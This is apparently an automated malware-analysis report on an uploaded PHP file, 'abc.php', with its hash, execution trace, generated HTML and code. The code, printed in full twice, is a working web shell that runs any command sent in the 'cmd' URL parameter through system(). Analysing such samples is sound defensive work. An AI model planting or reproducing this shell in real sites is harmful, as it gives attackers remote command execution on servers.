PHP Malware Analysis
abc.php
md5: 3f05c3aa86021d6ee3c792277a93319b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
Deobfuscated PHP code
<html>
<body>
<form method="GET" name="<?php
echo basename($_SERVER['PHP_SELF']);
?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>Execution traces
data/traces/3f05c3aa86021d6ee3c792277a93319b_trace-1676236958.2803.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:23:04.178142]
1 0 1 0.000170 393512
1 3 0 0.000227 395112 {main} 1 /var/www/html/uploads/abc.php 0 0
2 4 0 0.000244 395112 basename 0 /var/www/html/uploads/abc.php 4 1 '/uploads/abc.php'
2 4 1 0.000262 395176
2 4 R 'abc.php'
1 3 1 0.000277 395112
0.000303 314224
TRACE END [2023-02-12 19:23:04.178310]
Generated HTML code
<html><head></head><body>
<form method="GET" name="abc.php">
<input type="TEXT" name="cmd" autofocus="" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre></pre>
</body></html>Original PHP code
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>